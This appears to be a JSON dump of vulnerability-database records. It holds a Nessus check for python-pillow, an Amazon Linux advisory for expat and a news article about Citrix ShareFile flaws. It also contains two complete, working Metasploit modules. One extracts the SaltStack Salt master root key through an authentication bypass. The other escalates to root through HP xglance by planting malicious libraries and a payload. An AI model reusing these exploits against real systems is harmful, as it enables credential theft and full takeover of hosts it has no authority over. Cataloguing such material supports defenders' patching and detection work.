script_set_attribute(attribute:\"solution\", value:\n\"Update the affected python-pillow packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:U/RC:ND\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-4009\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/04/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/05/01\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:python-pillow\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:uvp:3.0.2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (uvp != \"3.0.2.0\") audit(AUDIT_OS_NOT, \"EulerOS Virtualization 3.0.2.0\");\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"aarch64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"aarch64\", cpu);\n\nflag = 0;\n\npkgs = [\"python-pillow-2.0.0-19.h6.gitd1c6db8\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"python-pillow\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "amazon": [{"lastseen": "2020-05-14T21:07:35", "bulletinFamily": "unix", "description": "**Issue Overview:**\n\nBuffer overflow in the XML parser in Mozilla Firefox before 38.0, Firefox ESR 31.x before 31.7, and Thunderbird before 31.7 allows remote attackers to execute arbitrary code by providing a large amount of compressed XML data, a related issue to [CVE-2015-1283 __](<https://access.redhat.com/security/cve/CVE-2015-1283>). ([CVE-2015-2716 __](<https://access.redhat.com/security/cve/CVE-2015-2716>))\n\n \n**Affected Packages:** \n\n\nexpat\n\n \n**Issue Correction:** \nRun _yum update expat_ to update your system. \n\n\n \n\n\n**New Packages:**\n \n \n i686: \n expat-2.1.0-11.22.amzn1.i686 \n expat-devel-2.1.0-11.22.amzn1.i686 \n expat-debuginfo-2.1.0-11.22.amzn1.i686 \n \n src: \n expat-2.1.0-11.22.amzn1.src \n \n x86_64: \n expat-debuginfo-2.1.0-11.22.amzn1.x86_64 \n expat-devel-2.1.0-11.22.amzn1.x86_64 \n expat-2.1.0-11.22.amzn1.x86_64 \n \n \n", "modified": "2020-05-14T02:27:00", "published": "2020-05-14T02:27:00", "id": "ALAS-2020-1364", "href": "https://alas.aws.amazon.com/ALAS-2020-1364.html", "title": "Medium: expat", "type": "amazon", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "metasploit": [{"lastseen": "2020-05-29T15:56:15", "bulletinFamily": "exploit", "description": "This module exploits unauthenticated access to the _prep_auth_info() method in the SaltStack Salt master's ZeroMQ request server, for versions 2019.2.3 and earlier and 3000.1 and earlier, to disclose the root key used to authenticate administrative commands to the master. VMware vRealize Operations Manager versions 7.5.0 through 8.1.0 are known to be affected by the Salt vulnerabilities. Tested against SaltStack Salt 2019.2.3 and 3000.1 on Ubuntu 18.04, as well as Vulhub's Docker image.\n", "modified": "2020-05-09T22:30:49", "published": "2020-05-06T09:45:56", "id": "MSF:AUXILIARY/GATHER/SALTSTACK_SALT_ROOT_KEY", "href": "", "type": "metasploit", "title": "SaltStack Salt Master Server Root Key Disclosure", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n\n include Msf::Exploit::Remote::ZeroMQ\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'SaltStack Salt Master Server Root Key Disclosure',\n 'Description' => %q{\n This module exploits unauthenticated access to the _prep_auth_info()\n method in the SaltStack Salt master's ZeroMQ request server, for\n versions 2019.2.3 and earlier and 3000.1 and earlier, to disclose the\n root key used to authenticate administrative commands to the master.\n\n VMware vRealize Operations Manager versions 7.5.0 through 8.1.0 are\n known to be affected by the Salt vulnerabilities.\n\n Tested against SaltStack Salt 2019.2.3 and 3000.1 on Ubuntu 18.04, as\n well as Vulhub's Docker image.\n },\n 'Author' => [\n 'F-Secure', # Discovery\n 'wvu' # Module\n ],\n 'References' => [\n ['CVE', '2020-11651'], # Auth bypass (used by this module)\n ['CVE', '2020-11652'], # Authed directory traversals (not used here)\n ['URL', 'https://labs.f-secure.com/advisories/saltstack-authorization-bypass'],\n ['URL', 'https://community.saltstack.com/blog/critical-vulnerabilities-update-cve-2020-11651-and-cve-2020-11652/'],\n ['URL', 'https://www.vmware.com/security/advisories/VMSA-2020-0009.html'],\n ['URL', 'https://github.com/saltstack/salt/blob/master/tests/integration/master/test_clear_funcs.py']\n ],\n 'DisclosureDate' => '2020-04-30', # F-Secure advisory\n 'License' => MSF_LICENSE,\n 'Actions' => [\n ['Dump', 'Description' => 'Dump root key from Salt master']\n ],\n 'DefaultAction' => 'Dump',\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'SideEffects' => [IOC_IN_LOGS]\n }\n )\n )\n\n register_options([\n Opt::RPORT(4506)\n ])\n end\n\n def run\n # These are from Msf::Exploit::Remote::ZeroMQ\n zmq_connect\n zmq_negotiate\n\n unless (root_key = extract_root_key(yeet_prep_auth_info))\n print_error('Could not find root key in serialized auth info')\n\n # Return CheckCode for exploit/linux/misc/saltstack_salt_unauth_rce\n return Exploit::CheckCode::Safe\n end\n\n print_good(\"Root key: #{root_key}\")\n\n # I hate this API, but store the root key in creds, too\n create_credential_and_login(\n workspace_id: myworkspace_id,\n module_fullname: fullname,\n origin_type: :service,\n address: rhost,\n port: rport,\n protocol: 'tcp',\n service_name: 'salt/zeromq',\n username: 'root',\n private_data: root_key,\n private_type: :password\n )\n\n # Return CheckCode for exploit/linux/misc/saltstack_salt_unauth_rce\n Exploit::CheckCode::Vulnerable(root_key) # And the root key as the reason!\n rescue EOFError, Rex::ConnectionError => e\n print_error(\"#{e.class}: #{e.message}\")\n ensure\n # This is from Msf::Exploit::Remote::ZeroMQ\n zmq_disconnect\n end\n\n def yeet_prep_auth_info\n print_status(\"Yeeting _prep_auth_info() at #{peer}\")\n\n zmq_send_message(serialize_clear_load('cmd' => '_prep_auth_info'))\n\n unless (res = sock.get_once)\n fail_with(Failure::Unknown, 'Did not receive auth info')\n end\n\n unless res.match(/user.+UserAuthenticationError.+root/m)\n fail_with(Failure::UnexpectedReply,\n \"Did not receive serialized auth info: #{res.inspect}\")\n end\n\n vprint_good('Received serialized auth info')\n\n # HACK: Strip assumed ZeroMQ header and leave assumed MessagePack \"load\"\n res[4..-1]\n end\n\n def extract_root_key(auth_info)\n # Fetch root key from appropriate index of deserialized data, presumably\n MessagePack.unpack(auth_info)[2]&.fetch('root')\n rescue EOFError, KeyError, MessagePack::MalformedFormatError => e\n print_error(\"#{__method__} failed: #{e.message}\")\n nil\n end\n\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/gather/saltstack_salt_root_key.rb"}], "thn": [{"lastseen": "2020-05-05T21:38:40", "bulletinFamily": "info", "description": "[](<https://thehackernews.com/images/-rHY5q681uo4/XrF299RyrnI/AAAAAAAA2vA/FOu7LoBCTF4TMJQGtp_MmgjccY8DP33uACLcBGAsYHQ/s728-e100/citrix-sharefile-vulnerability.jpg>)\n\nSince the past few weeks, software giant Citrix has privately been rolling out a critical software update to its enterprise customers that patches multiple security vulnerabilities affecting Citrix ShareFile content collaboration platform. \n \nThe security advisory\u2014about which The Hacker News learned from [Dimitri van de Giessen](<https://twitter.com/DimitriNL>), an ethical hacker and system engineer\u2014is scheduled to be available publicly later today on the [Citrix website](<https://support.citrix.com/article/CTX269106>). \n \nCitrix ShareFile is an enterprise-level file sharing solution for businesses using which employees can securely exchange proprietary and sensitive business data with each other. \n\n\n \nThe software offers an on-premises secure cloud environment for data storage with auditing capabilities and regulatory compliance controls. For example, a company can remotely lock or wipe data from potentially compromised mobile devices, or they're when lost or stolen. \n \nThe newly identified security issues (**CTX-CVE-2020-7473**) specifically affect customer-managed on-premises Citrix ShareFile storage zone controllers, a component that stores corporate data behind the firewall. \n \nThe list of vulnerabilities are: \n \n \n\n\n * CVE-2020-7473\n * CVE-2020-8982\n * CVE-2020-8983\n \n \n\n\n[](<https://thehackernews.com/images/-a4QlYJXh07Q/XrFxqV3hxNI/AAAAAAAA2uo/efArqRCyuuUX-dvErFscm6o1MTWmwbEMgCLcBGAsYHQ/s728-e100/citrix-sharefile-vulnerability.jpg>)\n\n \nAccording to the advisory, if exploited, the vulnerabilities could allow an unauthenticated attacker to compromise the storage zones controller potentially and access sensitive ShareFile documents and folders. \n \n\n\n## List of Affected and Patched Citrix ShareFile Versions\n\n \nIf your company uses on-premises ShareFile storage zones controller versions 5.9.0 / 5.8.0 /5.7.0/ 5.6.0 / 5.5.0 and earlier, you are affected and recommended to immediately upgrade your platform to Storage zones controller 5.10.0 / 5.9.1 / 5.8.1 or later. \n \nIt is important to note that if your storage zone was created on any of the affected versions, merely upgrading your software to a patched version would not completely resolve the vulnerability. \n\n\n \nTo fix this, the company has separately released a mitigation tool that you need to be run on your primary Storage zones controller first and then on any secondary controllers. \n \n\"Once the tool runs successfully on your primary zone, you MUST NOT revert any changes to it. Reverting changes will cause your zone to become unavailable,\" the advisory warned. \n \nYou can find a complete step by step details in the advisory, as soon as it becomes available publicly. \n \n\n\n[](<https://thehackernews.com/images/-yLGwc1sHZZY/XrFyQzIga-I/AAAAAAAA2u0/DnbkaOAXQA8S0AymXiocOzdV_jaV1HsqwCLcBGAsYHQ/s728-e100/citrix-software-vulnerability.jpg>)\n\n \nBesides the on-premises solution, the cloud versions of ShareFile storage zone controllers were also affected, but the company has already patched them and doesn't require any further action from users. \n \n\n\n## Where the Flaw Resides?\n\n \nAt the time of writing, though not much technical details on the underlying vulnerabilities are available, an initial patch inspection by Dimitri reveals that at least one of the flaws could have resided in an old ASP.net Toolkit that Citrix Sharefile used. \n \nThe 9-year-old outdated version of AjaxControlToolkit that's allegedly bundled with the affected versions of ShareFile software contains directory traversal and remote code execution vulnerabilities ([CVE-2015-4670](<https://www.cardinaleconcepts.com/cve-2015-4670-directory-traversal-to-remote-code-execution-in-ajaxcontroltoolkit/>)), which were disclosed publicly in 2015. \n \n\n\n[](<https://thehackernews.com/images/-lG8ThZL_3PU/XrFwoG1sGPI/AAAAAAAA2ug/GZ34rHtfoOAfRCxRdrmu3uO7pQxJxCNIQCLcBGAsYHQ/s728-e100/citrix-sharefile-vulnerability.jpg>)\n\n \nTo check if Citrix ShareFile implementation is affected or not, one can visit the following URL in the browser, and if the page returns blank, it's vulnerable, and if it through 404 error, it's either not flawed or has already been patched. \n \n\n\n> https://yoursharefileserver.companyname.com/UploadTest.aspx\n\n \nAccording to Dimitri, the mitigation tool makes some changes to the web.config file and then also deletes UploadTest.aspx and XmlFeed.aspx from the affected servers. \n\n\nHave something to say about this article? Comment below or share it with us on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter](<https://twitter.com/thehackersnews>) or our [LinkedIn Group](<https://www.linkedin.com/company/thehackernews/>).\n", "modified": "2020-05-05T16:14:59", "published": "2020-05-05T14:00:00", "id": "THN:9F1824BD0EEB6A1695B53AE380D04BF9", "href": "https://thehackernews.com/2020/05/citrix-sharefile-vulnerability.html", "type": "thn", "title": "Warning: Citrix ShareFile Flaw Could Let Attackers Steal Corporate Secrets", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:P"}}], "packetstorm": [{"lastseen": "2020-05-06T09:22:41", "bulletinFamily": "exploit", "description": "", "modified": "2020-05-04T00:00:00", "published": "2020-05-04T00:00:00", "id": "PACKETSTORM:157528", "href": "https://packetstormsecurity.com/files/157528/HP-Performance-Monitoring-xglance-Privilege-Escalation.html", "title": "HP Performance Monitoring xglance Privilege Escalation", "type": "packetstorm", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Local \nRank = GreatRanking \n \ninclude Msf::Post::Linux::Priv \ninclude Msf::Post::Linux::System \ninclude Msf::Post::Linux::Compile \ninclude Msf::Post::File \ninclude Msf::Exploit::EXE \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'HP Performance Monitoring xglance Priv Esc', \n'Description' => %q{ \nThis exploit takes advantage of xglance-bin, part of \nHP's Glance (or Performance Monitoring) version 11 'and subsequent' \n, which was compiled with an insecure RPATH option. The RPATH includes \na relative path to -L/lib64/ which can be controlled by a user. \nCreating libraries in this location will result in an \nescalation of privileges to root. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'h00die', # msf module \n'Tim Brown', # original finding \n'Robert Jaroszuk', # exploit \n'Marco Ortisi', # exploit \n], \n'Platform' => [ 'linux' ], \n'Arch' => [ ARCH_X86, ARCH_X64 ], \n'SessionTypes' => [ 'shell', 'meterpreter' ], \n'Targets' => \n[ \n[ 'Automatic', {} ], \n[ 'Linux x86', { 'Arch' => ARCH_X86 } ], \n[ 'Linux x64', { 'Arch' => ARCH_X64 } ] \n], \n'Privileged' => true, \n'References' => \n[ \n[ 'EDB', '48000' ], \n[ 'URL', 'https://seclists.org/fulldisclosure/2014/Nov/55' ], # permissions, original finding \n[ 'URL', 'https://www.redtimmy.com/linux-hacking/perf-exploiter/' ], # exploit \n[ 'URL', 'https://github.com/redtimmy/perf-exploiter' ], \n[ 'PACKETSTORM', '156206' ], \n[ 'URL', 'https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2630/' ], \n[ 'CVE', '2014-2630' ] \n], \n'DisclosureDate' => 'Nov 19 2014', \n'DefaultTarget' => 0 \n) \n) \nregister_options [ \nOptString.new('GLANCE_PATH', [ true, 'Path to xglance-bin', '/opt/perf/bin/xglance-bin' ]) \n] \nregister_advanced_options [ \nOptBool.new('ForceExploit', [ false, 'Override check result', false ]), \nOptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]) \n] \n \nend \n \n# Simplify pulling the writable directory variable \ndef base_dir \ndatastore['WritableDir'].to_s \nend \n \ndef exploit_folder \n\"#{base_dir}/-L/lib64/\" \nend \n \ndef glance_path \ndatastore['GLANCE_PATH'].to_s \nend \n \n# Pull the exploit binary or file (.c typically) from our system \ndef exploit_data(file) \n::File.binread ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2014-2630', file) \nend \n \ndef find_libs \nlibs = cmd_exec \"ldd #{glance_path} | grep libX\" \n%r{(?<lib>libX.+\\.so\\.\\d) => -L/lib64} =~ libs \nreturn nil if lib.nil? \n \nlib \nend \n \ndef check \nunless setuid? glance_path \nvprint_error \"#{glance_path} not found on system\" \nreturn CheckCode::Safe \nend \nlib = find_libs \nif lib.nil? \nvprint_error 'Patched xglance-bin, not linked to -L/lib64/' \nreturn CheckCode::Safe \nend \nvprint_good \"xglance-bin found, and linked to vulnerable relative path -L/lib64/ through #{lib}\" \nCheckCode::Appears \nend \n \ndef exploit \nunless check == CheckCode::Appears \nunless datastore['ForceExploit'] \nfail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.' \nend \nprint_warning 'Target does not appear to be vulnerable' \nend \n \nif is_root? \nunless datastore['ForceExploit'] \nfail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override' \nend \nend \n \nunless writable? base_dir \nfail_with Failure::BadConfig, \"#{base_dir} is not writable\" \nend \n \n# delete exploit folder in case a previous attempt failed \nvprint_status(\"Deleting exploit folder: #{base_dir}/-L\") \nrm_cmd = \"rm -rf \\\"#{base_dir}/-L\\\"\" \ncmd_exec(rm_cmd) \n# make folder \nvprint_status(\"Creating exploit folder: #{exploit_folder}\") \ncmd_exec \"mkdir -p #{exploit_folder}\" \nregister_dir_for_cleanup \"#{base_dir}/-L\" \n \n# drop our .so on the system that calls our payload \n# we need gcc to compile instead of metasm since metasm \n# removes unused variables, which we need to keep xglance-bin \n# from breaking and not launching our exploit \nso_file = \"#{exploit_folder}libXm.so.3\" \nif live_compile? \nvprint_status 'Live compiling exploit on system...' \npayload_path = \"#{base_dir}/.#{rand_text_alphanumeric(5..10)}\" \ncode = exploit_data('CVE-2014-2630.c') \ncode.sub!('#{payload_path}', payload_path) # inject our payload path \nupload_and_compile so_file, code, '-fPIC -shared -static-libgcc' \nrm_f \"#{so_file}.c\" \nelse \npayload_path = '/tmp/.u4aLoiq' \nvprint_status 'Dropping pre-compiled exploit on system...' \nupload_and_chmodx so_file, exploit_data('libXm.so.3') \nend \n \n# Upload payload executable \nvprint_status 'uploading payload' \nupload_and_chmodx payload_path, generate_payload_exe \n \n# link so files to exploit vuln \nlib = find_libs \n# just to be safe, Xt and Xp were in the original exploit \n# our mock binary is also exploitsable through libXmu.so.6 \n# unsure about the real binary \ncd exploit_folder \n['libXp.so.6', 'libXt.so.6', 'libXmu.so.6', lib].each do |l| \ncmd_exec \"ln -s libXm.so.3 #{l}\" \nend \n \n# Launch exploit \nprint_status 'Launching xglance-bin...' \ncd base_dir \noutput = cmd_exec glance_path \noutput.each_line { |line| vprint_status line.chomp } \nprint_warning(\"Manual cleanup of #{exploit_folder} may be required\") \nend \nend \n`\n", "cvss": {"score": 4.4, "vector": "AV:L/AC:M/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/157528/hp_xglance_priv_esc.rb.txt"}]}
